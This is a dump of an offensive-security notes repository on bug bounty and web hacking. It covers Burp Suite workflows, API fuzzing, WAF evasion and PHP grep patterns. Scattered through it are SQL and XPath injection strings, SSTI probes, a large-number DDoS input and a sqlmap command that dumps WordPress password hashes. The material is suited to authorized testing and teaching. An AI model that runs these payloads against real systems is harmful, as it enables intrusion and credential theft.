├── tools ├── wfuzz.md ├── web-scanners.md ├── nmap.md └── recon-ng.md ├── .gitbook └── assets │ ├── image.png │ ├── recon-ng.JPG │ ├── image (1).png │ ├── image (10).png │ ├── image (11).png │ ├── image (12).png │ ├── image (13).png │ ├── image (14).png │ ├── image (15).png │ ├── image (16).png │ ├── image (17).png │ ├── image (18).png │ ├── image (2).png │ ├── image (3).png │ ├── image (4).png │ ├── image (5).png │ ├── image (6).png │ ├── image (7).png │ ├── image (8).png │ ├── image (9).png │ └── businesslogic.txt ├── README.md ├── burp-suite ├── autorize.md ├── turbo-intruder.md ├── other-extensions.md ├── burp-tips.md ├── intruder-payload-processing.md └── methodology.md ├── api-attacks ├── json-testing-in-apis.md ├── api-soap-wsdl-tricks.md ├── common-endpoints.md ├── api-attacks.md ├── checklist.md └── 31-days-of-api-security-tricks.md ├── api-penetration-testing ├── json-testing-in-apis.md ├── api-soap-wsdl-tricks.md ├── common-endpoints.md ├── api-attacks.md ├── checklist.md └── 31-days-of-api-security-tricks.md ├── waf-bypasses ├── tools-and-resources.md ├── cloudflare.md ├── general-waf-torment.md └── testing-methodology-evasion-techniques.md ├── bug-bounty-web-hacking ├── ssti.md ├── http-methods-vulns..md ├── application-and-business-logic.md ├── php-grep-payloads.md ├── untitled.md ├── csrf.md ├── other-attacks.md ├── ssrf.md ├── lfi.md └── command-injection.md ├── SUMMARY.md └── enumeration └── port-139-445-smb-netbios.md /tools/wfuzz.md: -------------------------------------------------------------------------------- 1 | # Wfuzz 2 | 3 | -------------------------------------------------------------------------------- /.gitbook/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image.png -------------------------------------------------------------------------------- /.gitbook/assets/recon-ng.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/recon-ng.JPG -------------------------------------------------------------------------------- /.gitbook/assets/image (1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (1).png -------------------------------------------------------------------------------- /.gitbook/assets/image (10).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (10).png -------------------------------------------------------------------------------- /.gitbook/assets/image (11).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (11).png -------------------------------------------------------------------------------- /.gitbook/assets/image (12).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (12).png -------------------------------------------------------------------------------- /.gitbook/assets/image (13).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (13).png -------------------------------------------------------------------------------- /.gitbook/assets/image (14).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (14).png -------------------------------------------------------------------------------- /.gitbook/assets/image (15).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (15).png -------------------------------------------------------------------------------- /.gitbook/assets/image (16).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (16).png -------------------------------------------------------------------------------- /.gitbook/assets/image (17).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (17).png -------------------------------------------------------------------------------- /.gitbook/assets/image (18).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (18).png -------------------------------------------------------------------------------- /.gitbook/assets/image (2).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (2).png -------------------------------------------------------------------------------- /.gitbook/assets/image (3).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (3).png -------------------------------------------------------------------------------- /.gitbook/assets/image (4).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (4).png -------------------------------------------------------------------------------- /.gitbook/assets/image (5).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (5).png -------------------------------------------------------------------------------- /.gitbook/assets/image (6).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (6).png -------------------------------------------------------------------------------- /.gitbook/assets/image (7).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (7).png -------------------------------------------------------------------------------- /.gitbook/assets/image (8).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (8).png -------------------------------------------------------------------------------- /.gitbook/assets/image (9).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/scumdestroy/Infosec-Corruption/HEAD/.gitbook/assets/image (9).png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: "Aggregate Concatenation of Anti-Sec Notes ad nauseam \U0001F3F4 by Jann Moon \U0001F318" 3 | --- 4 | 5 | # 💣 Infosec Corruption 6 | 7 | Greetings destroyers, breakers, cyber-demolitionists, anti-sec defilers, and annihilationists! 🙏 8 | 9 | Welcome to my eternally amassing repository of notes about hacking, bug-bounty and general offensive infosec knowledge I've picked up from books, blogs, CTFs, courses and experience. Hope it helps some of y'all. 😺 10 | 11 | 12 | 13 | http://github.com/scumdestroy 14 | 15 | -------------------------------------------------------------------------------- /burp-suite/autorize.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Finding authorization issues with autorize 3 | --- 4 | 5 | # Autorize 6 | 7 | ### Basic workflow 8 | 9 | 1. Login to the target application as a low or non-privileged user 10 | 2. Visit the Autorize tab in burp, keep it off during configuration 11 | 3. Click Configuration 12 | 4. Click Fetch cookies from last request 13 | 5. Open an incognito window in your browser 14 | 6. Login as a higher privileged user 15 | 7. Click "Autorize is off" button to turn it on 16 | 8. Visit various areas of the site, but focus on sensitive areas that require privileged accounts to access or actions a lower privileged user should not be able to accomplish 17 | 9. Frown at the results until you find something interesting. 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /api-attacks/json-testing-in-apis.md: -------------------------------------------------------------------------------- 1 | # JSON testing in APIs 2 | 3 | **Types of JSON data and how to fuzz them** 4 | 5 | * strings : whatever u want 191919 6 | * number : 123 7 | * object : { } 8 | * array : \[ \] 9 | * boolean : true/false 10 | * null : null 11 | 12 | try mixing data formats as welll as trying different values while fuzzing 13 | 14 | for exaxmple, auth token should be string, therefore try… 15 | 16 | * {"authtoken": true, ...} 17 | * {"authtoken": \[\], ...} 18 | * {"authtoken": {}, ...} 19 | * {"authtoken": 0, ...} 20 | * {"authtoken": \[true, "your-secret"\], ...} 21 | 22 | for **DDoS** or creating digital server retardation, this is the biggest number you can put in \(128 or 256 bits depending on parser\), input it in number parameters \(i.e. limit, per\_page, etc..\) 23 | 24 | {..., limit: 10e307} 25 | 26 | -------------------------------------------------------------------------------- /api-penetration-testing/json-testing-in-apis.md: -------------------------------------------------------------------------------- 1 | # JSON testing in APIs 2 | 3 | **Types of JSON data and how to fuzz them** 4 | 5 | * strings : whatever u want 191919 6 | * number : 123 7 | * object : { } 8 | * array : \[ \] 9 | * boolean : true/false 10 | * null : null 11 | 12 | try mixing data formats as welll as trying different values while fuzzing 13 | 14 | for exaxmple, auth token should be string, therefore try… 15 | 16 | * {"authtoken": true, ...} 17 | * {"authtoken": \[\], ...} 18 | * {"authtoken": {}, ...} 19 | * {"authtoken": 0, ...} 20 | * {"authtoken": \[true, "your-secret"\], ...} 21 | 22 | for **DDoS** or creating digital server retardation, this is the biggest number you can put in \(128 or 256 bits depending on parser\), input it in number parameters \(i.e. limit, per\_page, etc..\) 23 | 24 | {..., limit: 10e307} 25 | 26 | -------------------------------------------------------------------------------- /waf-bypasses/tools-and-resources.md: -------------------------------------------------------------------------------- 1 | # Tools and Resources 2 | 3 | **TOOLS** 4 | 5 | {% embed url="https://github.com/LandGrey/abuse-ssl-bypass-waf" %} 6 | 7 | {% embed url="https://github.com/enablesecurity/wafw00f" %} 8 | 9 | {% embed url="https://github.com/stamparm/identywaf" %} 10 | 11 | \*\*\*\*[**https://github.com/lightbulb-framework/lightbulb-framework**](https://github.com/lightbulb-framework/lightbulb-framework)\*\*\*\* 12 | 13 | {% embed url="https://github.com/khalilbijjou/wafninja" %} 14 | 15 | **BYPASS WAF for Burp Suite** 16 | [**https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c**](https://portswigger.net/bappstore/ae2611da3bbc4687953a1f4ba6a4e04c)\*\*\*\* 17 | 18 | \*\*\*\*[**https://github.com/migolovanov/libinjection-fuzzer**](https://github.com/migolovanov/libinjection-fuzzer)\*\*\*\* 19 | 20 | **LINKS** 21 | 22 | {% embed url="https://github.com/0xInfection/Awesome-WAF" %} 23 | 24 | \*\*\*\* 25 | 26 | \*\*\*\* 27 | 28 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/ssti.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: Server Side Template Injection 3 | --- 4 | 5 | # SSTI 6 | 7 | Another vulnerability that falls victim to flawed input sanitization. Though not as common as XSS or SQLI, due to the fact that the functionality of providing a template engine that renders static template files, replacing the built-in variables with actual values is not as common as a basic user input, or reliance on back-end database. In addition, there are generally only certain frameworks that are vulnerable, though a successful attack on these can lead from private information disclosure to a full on RCE. 8 | 9 | Generally pretty simple to test for and understand if the vulnerability is present. Just drop a payload like `${{7*7}}` or `#${7*7}` and if the web app parses it into a 49, the bounty gates will open for you and dazzle you with riches \(hopefully\). 10 | _Also, you can of course test for XSS, SQLI and any other input madness of interest to you._ 11 | 12 | -------------------------------------------------------------------------------- /tools/web-scanners.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A gang of automated web-scanners that check for multiple vulnerabilities or 4 | conduct several recon steps for the lazy and uninitiated, because we can't 5 | always be expected to perform exceptionally. 6 | --- 7 | 8 | # Web-scanners 9 | 10 | Some of these tools are so easy to use, where you just point it at a domain with one command line flag and are able to burn through 50+ tests with the push of a button. It is important to understand what these are doing \(or the information will be relatively useless in actually exploiting or reporting the vulnerability\) and be able to do these tests on an individual basis, as you may be forced to do so after gaining a shell on a box without these tools and where file transfers are not allowed, firewalls block everything, you are stuck as an unprivileged user or you are in a situation that requires serious stealth. 11 | 12 | **Recon-ng** 13 | 14 | **Sniper** 15 | 16 | **Yuki-Chan** 17 | 18 | **Nikto** 19 | 20 | **Arachni** 21 | 22 | **Recsech** 23 | 24 | **Reconcobra** 25 | 26 | **Raccoon** 27 | 28 | **Reconnoitre** 29 | 30 | -------------------------------------------------------------------------------- /burp-suite/turbo-intruder.md: -------------------------------------------------------------------------------- 1 | # Turbo Intruder 2 | 3 | highlight what you want to fuzz and send to turbo 4 | 5 | customize the python code that opens up if you want 6 | 7 | request area replaced with %s \(payloads will be placed here\) 8 | 9 | filtering boring results 10 | 11 | example: 12 | 13 | _`def handleResponse(req, interesting);`_ 14 | 15 | _`if '200 oOK' in req.response:`_ 16 | 17 | _`table.add(req)`_ 18 | 19 | this strategy is used by default script 20 | 21 | **speed tuning:** 22 | 23 | `pipeline` 24 | 25 | `requestsPerConnection` 26 | 27 | `concurrentConnections` 28 | 29 | the goal is to get your retries counter close to 0 30 | 31 | -can go up inspeed by changing **GET** to **HEAD** or changing size of request 32 | 33 | **finding race conditions** - default mode isn't great for this, to find a race condition, you'll want to ensure your requests hit the target in as small of a window as possible, which you can do by queuing your requests before starting the request engine, turbo intruder comes with an example of this \(race.py\) 34 | 35 | It also comes with... 36 | 37 | * special/wordlists.py\(2 of them\) 38 | * one super long bruteforcer 39 | * one that containes all words observed in inscope proxy traffic 40 | 41 | -------------------------------------------------------------------------------- /burp-suite/other-extensions.md: -------------------------------------------------------------------------------- 1 | # Other extensions 2 | 3 | 4 | 5 | **SAML RAIDER** 6 | 7 | * sso + federated logins 8 | * assertions from IDP XML attacks 9 | * signature manipulation \(tampering attributes, replay, re-signing\) 10 | * certificate stripping 11 | * authentication, auth bypass and privesc 12 | 13 | _HOW TO ATTACK WITH SAML RAIDER_ 14 | 15 | 1. Sign the message 16 | 2. sign the assertion 17 | 3. sign the assertion and later sign the message 18 | 4. tampering 19 | 5. public keys + certificates 20 | 6. service provide and identity provider 21 | 22 | **backslash powered scanbastard - efficient at finding...** 23 | 24 | * research grade vulns 25 | * high hanging fruits 26 | * injection vulns 27 | * input filtering 28 | * red teaming 29 | * waf fucking 30 | 31 | **AUTO REPEATER** 32 | 33 | -auto duplicate/modify/resend any request 34 | 35 | conditional replacements 36 | 37 | * quick header/cookie/param replacements 38 | * difference viewer 39 | * re-name-able tabs 40 | 41 | best use cases :: 42 | 43 | * test every req. made from one user as multiple others 44 | * test every req from user without authentication 45 | * test every request w/o CSRF mitigation params 46 | * replace every instance of a parameter named email with another email 47 | * perform any combo of these 48 | 49 | -------------------------------------------------------------------------------- /api-attacks/api-soap-wsdl-tricks.md: -------------------------------------------------------------------------------- 1 | # API/SOAP/WSDL Tricks 2 | 3 | 4 | 5 | * sql injection test 6 | * wildcards : \* and % 7 | * ' or 1=1-- 8 | * empty strings or ' or "=' 9 | 10 | _Login then login then login then login_ 11 | 12 | * try normal, then mix up correct, expired and faulty session IDs 13 | 14 | Login, get sessionID 15 | 16 | * logout 17 | * make request while logged out w/ sssionID 18 | * request with expired ID 19 | * request with faulty sessionID 20 | * how about two IDs log in simultaneously and send requests 21 | 22 | send 23 | 24 | * Username and password 25 | * just password 26 | * just username 27 | * username and username 28 | * password and password 29 | * nothing just <login> </logiN> 30 | * <user\_name> <pass\_word> 31 | * <user> <pass> 32 | * <username> <pass> 33 | * <user> bigboy </user> 34 | * mypassword </password> 35 | * make payloads gigantic 36 | 37 | **xpath injection:** 38 | 39 | <login> 40 | string\(//user\[username/text\(\)='' or '1' = '1' and password/text\(\)='' or '1' = '1'\]\) 41 | </login> 42 | 43 | 44 | 45 | Looking for BOLA \(IDOR\) in APIs? got 401/403 errors? 46 | 47 | AuthZ bypass tricks: 48 | 49 | * Wrap ID with an array {“id”:111} --> {“id”:\[111\]} 50 | * JSON wrap {“id”:111} --> {“id”:{“id”:111}} 51 | * Send ID twice URL?id=<LEGIT>&id=<VICTIM> 52 | * Send wildcard {"user\_id":"\*"} 53 | 54 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/http-methods-vulns..md: -------------------------------------------------------------------------------- 1 | # HTTP Methods Vulns. 2 | 3 | **PUT** : allows a user to store data or files on the server, if not applied carefully, an attacker can put malicious code on server 4 | 5 | **DELETE :** delete important shit 6 | 7 | **CONNECT :** another http method that usually isn't available to any users, can potentially allow a user to connect via a p2p tunnel connection, bypass IDS and upload/download sensitive files. 8 | 9 | **HEAD :** although typically not seen as a vulnerable method, \(for example\) when the site uses java web.xml files for authorization, they may only filter `GET` and `POST` requests, so `HEAD` can be used to bypass authorization. 10 | 11 | `nmap --script=http-methods.nse --script-args http-methods.retest=1` 12 | 13 | or you can manually send requests via netcat, telnet, postman, burp's repeater or any client that can access SOAP/REST. 14 | 15 | **HTTP HEADERS** 16 | 17 | `X-Forwarded-Host 18 | X-Forwarded-Port 19 | X-Forwarded-Scheme 20 | Origin: null 21 | Origin: [siteDomain].attacker.com 22 | X-Frame-Options: Allow 23 | X-Forwarded-For: 127.0.0.1 24 | X-Client-IP: 127.0.0.1 25 | Client-IP: 127.0.0.1` 26 | 27 | **---For injecting BXSS\(blind XSS\) \|\| SQLI payloads---** 28 | 29 | `Referer 30 | X-Wap-Profile 31 | X-Original-Url 32 | Forwarded 33 | X-Originated-IP 34 | X-Client-IP 35 | From User Agent` 36 | 37 | **---Possible File upload vulnerabilities---** 38 | X-HTTP-Method-Override: PUT 39 | 40 | -------------------------------------------------------------------------------- /waf-bypasses/cloudflare.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Truly an adversary of mine, not by their cleverness and cunning, mostly by 4 | their endless numbers, seemingly haunting me at every turn.. 5 | --- 6 | 7 | # Cloudflare 8 | 9 | **Finding a website's real IP address** 10 | 11 | Finding the IP address of a website can help you in finding vulnerabilities, accessing accurate scans and other hidden goods that may not be as well protected, due to the expectation that the WAF will take care of any intruders by annoying them until they give up and move to another target. 12 | Some options you have at your disposal: 13 | 14 | This beautiful website keeps track of records sites may have had before signing up with cloudflare: 15 | [http://crimeflare.org:82/cfs.html](http://crimeflare.org:82/cfs.html) 16 | 17 | You can also see DNS history on 18 | [netcraft.com](https://toolbox.netcraft.com) 19 | [viewdns.info](https://viewdns.info) 20 | [securitytrails.com](https://securitytrails.com) 21 | 22 | You can also do enumeration and recon on subdomains, MX records and other assets with simple tools like `dig` and `nslookup` 23 | 24 | You can also try sending an e-mail to a fake address at the domain you are attending to uncover \(fakeyfakestrom8888888889@cloudydomain.com\) and the response you'll receive may have the IP details in it, if you examine all details from your e-mail or wireshark. Though I think the outcome is the same as digging into MX records, and arguable noisier if you are trying to absolutely stay off of their radar. 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /.gitbook/assets/businesslogic.txt: -------------------------------------------------------------------------------- 1 | Identify the logic attack surface 2 | What does the application do, what is the most value, what would an attacker want to access? 3 | 4 | Test transmission of data via the client 5 | Is there a desktop application or mobile application, does the transferral of information vary between this and the web application 6 | 7 | Test for reliance on client-side input validation 8 | Does the application attempt to base it's logic on the client side, for example do forms have a maximum length client side that can be edited with the browser that are simply accepted as true? 9 | 10 | Test any thick-client components (Java, ActiveX, Flash) 11 | Does the application utilize something like Java, Flash, ActiveX or silverlight? can you download the applet and reverse engineer it? 12 | 13 | Test multi-stage processes for logic flaws 14 | Can you go from placing an order straight to delivery thus bypassing payment? or a similar process? 15 | 16 | Test handling of incomplete input 17 | Can you pass the application dodgy input and does it process it as normal, this can point to other issues such as RCE & XSS. 18 | 19 | Test trust boundaries 20 | What is a user trusted to do, can they access admin aspects of the app? 21 | 22 | Test transaction logic 23 | 24 | Can you pay £0.00 for an item that should be £1,000,000 etc? 25 | 26 | Test for Insecure direct object references(IDOR) 27 | 28 | Can you increment through items, users. uuids or other sensitive info? 29 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/application-and-business-logic.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Oftentimes, bounty hunters need to get across the impact of the vulnerability, 4 | sometimes to those with less technical understanding than us. Some concepts 5 | to guide your testing and frame your report 6 | --- 7 | 8 | # Application & Business Logic 9 | 10 | * Identify the logic attack surface What does the application do, what is the most value, what would an attacker want to access? 11 | * Test transmission of data via the client Is there a desktop application or mobile application, does the transferal of information vary between this and the web application 12 | * Test for reliance on client-side input validation Does the application attempt to base it's logic on the client side, for example do forms have a maximum length client side that can be edited with the browser that are simply accepted as true? 13 | * Test any thick-client components \(Java, ActiveX, Flash\) Does the application utilize something like Java, Flash, ActiveX or silverlight? can you download the applet and reverse engineer it? 14 | * Test multi-stage processes for logic flaws Can you go from placing an order straight to delivery thus bypassing payment? or a similar process? 15 | * Test handling of incomplete input Can you pass the application dodgy input and does it process it as normal, this can point to other issues such as RCE & XSS. 16 | * Test trust boundaries What is a user trusted to do, can they access admin aspects of the app? 17 | * Test transaction logic 18 | * Can you pay £0.00 for an item that should be £1,000,000 etc? 19 | * Test for Insecure direct object references\(IDOR\) 20 | * Can you increment through items, users. uuids or other sensitive info? 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /api-penetration-testing/api-soap-wsdl-tricks.md: -------------------------------------------------------------------------------- 1 | # API/SOAP/WSDL Tricks 2 | 3 | * Classic SQL injection test / payload stuffing assault (i.e. `' or '1'='1 --`) 4 | - Trying to use a POST or JSON or even SOAP/XML request? You can copy-paste it from Burp into file, tag your intended injection point with a `*` and slap it into sqlmap or ghauri with the `-r muh_req.req` flag. 5 | * Pop in some wildcards: `*` and `%` 6 | * Throw in some empty strings or `'`, `"`, `=` or `'` 7 | 8 | Mess around with parameters like: 9 | `_Login` then `login` then `login` then `login_` 10 | 11 | * Try using a valid session or UUID, then mix it up with (other people's) correct, expired and faulty session IDs. Note changes in server response time, minimal differences in response size or content and investigate deeper. 12 | 13 | Quick login testing methodology run: 14 | - Login, get sessionID 15 | - logout 16 | - make request while logged out w/ sssionID 17 | - request with expired ID 18 | - request with faulty sessionID 19 | - how about two IDs log in simultaneously and send requests (parameter pollution? race condition? almost anything you can do to a normal web app) 20 | 21 | More tests to try, just to show mindset: 22 | Try sending... 23 | * Username and password 24 | * just password 25 | * just username 26 | * username and username 27 | * password and password 28 | * nothing just <login> </logiN> 29 | * <user\_name> <pass\_word> 30 | * <user> <pass> 31 | * <username> <pass> 32 | * <user> bigboy </user> 33 | * mypassword </password> 34 | * make payloads gigantic 35 | 36 | ### **xpath injection:** 37 | 38 | <login> 39 | string\(//user\[username/text\(\)='' or '1' = '1' and password/text\(\)='' or '1' = '1'\]\) 40 | </login> 41 | 42 | 43 | ### **JSON data desecration** 44 | 45 | Some things you can use to get BOLAs/IDORs, bypass auth or another mysterious outcome in your favor! 46 | 47 | * Wrap ID with an array {“id”:111} --> {“id”:\[111\]} 48 | * JSON wrap {“id”:111} --> {“id”:{“id”:111}} 49 | * Send wildcard {"user\_id":"\*"} 50 | 51 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [💣 Infosec Corruption](README.md) 4 | 5 | ## Bug-Bounty/Web-Hacking 6 | 7 | * [Application & Business Logic](bug-bounty-web-hacking/application-and-business-logic.md) 8 | * [Command Injection](bug-bounty-web-hacking/command-injection.md) 9 | * [CRLF](bug-bounty-web-hacking/other-attacks.md) 10 | * [CSRF](bug-bounty-web-hacking/csrf.md) 11 | * [HTTP Methods Vulns.](bug-bounty-web-hacking/http-methods-vulns..md) 12 | * [IDORs / Auth. Bugs](bug-bounty-web-hacking/untitled.md) 13 | * [LFI](bug-bounty-web-hacking/lfi.md) 14 | * [SSRF](bug-bounty-web-hacking/ssrf.md) 15 | * [SSTI](bug-bounty-web-hacking/ssti.md) 16 | * [Code Analysis : PHP & grep](bug-bounty-web-hacking/php-grep-payloads.md) 17 | 18 | ## Burp Suite 19 | 20 | * [Autorize](burp-suite/autorize.md) 21 | * [Burp tips](burp-suite/burp-tips.md) 22 | * [Methodology](burp-suite/methodology.md) 23 | * [Intruder Payload Processing](burp-suite/intruder-payload-processing.md) 24 | * [Other extensions](burp-suite/other-extensions.md) 25 | * [Turbo Intruder](burp-suite/turbo-intruder.md) 26 | 27 | ## API Penetration Testing 28 | 29 | * [API attacks](api-penetration-testing/api-attacks.md) 30 | * [API/SOAP/WSDL Tricks](api-penetration-testing/api-soap-wsdl-tricks.md) 31 | * [Checklist](api-penetration-testing/checklist.md) 32 | * [Common endpoints](api-penetration-testing/common-endpoints.md) 33 | * [JSON testing in APIs](api-penetration-testing/json-testing-in-apis.md) 34 | * [31 days of API security tricks](api-penetration-testing/31-days-of-api-security-tricks.md) 35 | 36 | ## Tools 37 | 38 | * [Nmap](tools/nmap.md) 39 | * [Web-scanners](tools/web-scanners.md) 40 | * [Recon-ng](tools/recon-ng.md) 41 | * [Wfuzz](tools/wfuzz.md) 42 | 43 | ## WAF Bypasses 44 | 45 | * [General WAF torment](waf-bypasses/general-waf-torment.md) 46 | * [Cloudflare](waf-bypasses/cloudflare.md) 47 | * [Testing Methodology/Evasion techniques](waf-bypasses/testing-methodology-evasion-techniques.md) 48 | * [Tools and Resources](waf-bypasses/tools-and-resources.md) 49 | 50 | ## Enumeration 51 | 52 | * [Port 139, 445 : SMB/NetBIOS](enumeration/port-139-445-smb-netbios.md) 53 | 54 | -------------------------------------------------------------------------------- /burp-suite/burp-tips.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: A few things to use sometimes to get it in 3 | --- 4 | 5 | # Burp tips 6 | 7 | * search `"` 34 | * \`\` 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /bug-bounty-web-hacking/php-grep-payloads.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: 'If the source code gets leaky, dig through the spaghetti a little.' 3 | --- 4 | 5 | # Code Analysis : PHP & grep 6 | 7 | PHP Vulnerabilities could fill a library and will likely continue to fill evermore through the years of this language's livelihood on the web. If you do get a chance to see the source code of a web app; be it open-source on github, a white-box test or just a poorly implemented leaky framework, here are some golden nuggets to grep for. 8 | 9 | **XSS:** 10 | grep -Ri "echo" . 11 | grep -Ri "$_" . \| grep "echo" 12 | grep -Ri "$\_GET" . \| grep "echo" 13 | grep -Ri "$\_POST" . \| grep "echo" 14 | grep -Ri "$\_REQUEST" . \| grep "echo" 15 | 16 | **Command execution:** 17 | grep -Ri "shell\_exec\(" . 18 | grep -Ri "system\(" . 19 | grep -Ri "exec\(" . 20 | grep -Ri "popen\(" . 21 | grep -Ri "passthru\(" . 22 | grep -Ri "proc\_open\(" . 23 | grep -Ri "pcntl\_exec\(" . 24 | 25 | **Code execution:** 26 | grep -Ri "eval\(" . 27 | grep -Ri "assert\(" . 28 | grep -Ri "preg\_replace" . \| grep "/e" 29 | grep -Ri "create\_function\(" . 30 | 31 | **SQL Injection:** 32 | grep -Ri "$sql" . 33 | grep -Ri "$sql" . \| grep "$_" 34 | 35 | **SQLMAP Cheatsheet for WordPress:** 36 | `sqlmap -u "`[`http://target.tld/?paramater=1`](http://target.tld/?paramater=1)`" -p "parameter" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user`_`login,user_pass from wp_users"` 37 | 38 | **Information leak via phpinfo:** 39 | grep -Ri "phpinfo" . 40 | 41 | **Find dev and debug modes:** 42 | grep -Ri "debug" . 43 | grep -Ri "$\_GET\['debug'\]" . 44 | grep -Ri "$\_GET\['test'\]" . 45 | 46 | **RFI/LFI:** 47 | grep -Ri "file\_include" . 48 | grep -Ri "include\(" . 49 | grep -Ri "require\(" . 50 | grep -Ri "require\($file\)" . 51 | grep -Ri "include\_once\(" . 52 | grep -Ri "require\_once\(" . 53 | grep -Ri "require\_once\(" . \| grep "$_" 54 | 55 | **Misc:** 56 | grep -Ri "header\(" . \| grep "$\_" 57 | grep -Ri '$\_SERVER\["HTTP\_USER\_AGENT"\]' . 58 | 59 | **Path Traversal:** 60 | grep -Ri file\_get\_contents . 61 | RATS Auditing tool for C, C++, Perl, PHP and Python 62 | 63 | -------------------------------------------------------------------------------- /api-attacks/common-endpoints.md: -------------------------------------------------------------------------------- 1 | # Common endpoints 2 | 3 | actuator 4 | 5 | health 6 | 7 | trace 8 | 9 | logfile 10 | 11 | metrics 12 | 13 | heapdump 14 | 15 | status 16 | 17 | ping 18 | 19 | api-docs 20 | 21 | application.wadl 22 | 23 | doc 24 | 25 | docs 26 | 27 | swagger-ui.html 28 | 29 | swagger.json 30 | 31 | jolokia 32 | 33 | apis 34 | 35 | api/v1/ 36 | 37 | healthz 38 | 39 | metrics 40 | 41 | swagger.json 42 | 43 | api/proxy 44 | 45 | download 46 | 47 | readfile 48 | 49 | read\_file 50 | 51 | fetch 52 | 53 | admin 54 | 55 | api/proxy?url= 56 | 57 | api/payment?id= 58 | 59 | heapdump 60 | 61 | admin/heapdump 62 | 63 | manage/heapdump 64 | 65 | actuator/heapdump 66 | 67 | solr 68 | 69 | Search-Replace-DB/ 70 | 71 | Search-Replace-DB-master/ 72 | 73 | adminer.sql 74 | 75 | composer.json 76 | 77 | manifest.json 78 | 79 | temp/ 80 | 81 | data/ 82 | 83 | test 84 | 85 | debug 86 | 87 | backup 88 | 89 | old 90 | 91 | \_admin 92 | 93 | backup 94 | 95 | application.wadl 96 | 97 | metrics 98 | 99 | graph 100 | 101 | .svn 102 | 103 | mw-config 104 | 105 | dev 106 | 107 | maintenance 108 | 109 | status2 110 | 111 | \_legacy 112 | 113 | 2 114 | 115 | graph 116 | 117 | graphiql 118 | 119 | graphql 120 | 121 | graphql-explorer 122 | 123 | graphql/cponsole 124 | 125 | heapdump 126 | 127 | jenkins/script 128 | 129 | manage/hea\[du,\[ 130 | 131 | secure/attachmentzip 132 | 133 | secure/configurereport.jspa 134 | 135 | testing 136 | 137 | version 138 | 139 | out 140 | 141 | sr 142 | 143 | sj 144 | 145 | charts 146 | 147 | secure/configurereport!default.jspa 148 | 149 | api/batch 150 | 151 | proxy/ 152 | 153 | metrics 154 | 155 | Target/proxy/attacker\_IP/attacker\_port/ 156 | 157 | ui/\#/app 158 | 159 | java 160 | 161 | dashboard 162 | 163 | pprof 164 | 165 | proxy 166 | 167 | nomad 168 | 169 | nomad/global/ 170 | 171 | nomad/global/cluster 172 | 173 | .php.swp 174 | 175 | test/ 176 | 177 | demo 178 | 179 | .git 180 | 181 | secret 182 | 183 | actuator 184 | 185 | beans 186 | 187 | service?wsdl 188 | 189 | passwords 190 | 191 | system/console 192 | 193 | config 194 | 195 | upload 196 | 197 | files 198 | 199 | proxy 200 | 201 | server-status 202 | 203 | web-INF/web.xml 204 | 205 | -------------------------------------------------------------------------------- /api-penetration-testing/common-endpoints.md: -------------------------------------------------------------------------------- 1 | # Common endpoints 2 | 3 | API Endpoint lists can be created by your experiences, pulling words you think might fit or automatically with a tool like Cewl. Here's a few other sources too: 4 | [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) 5 | 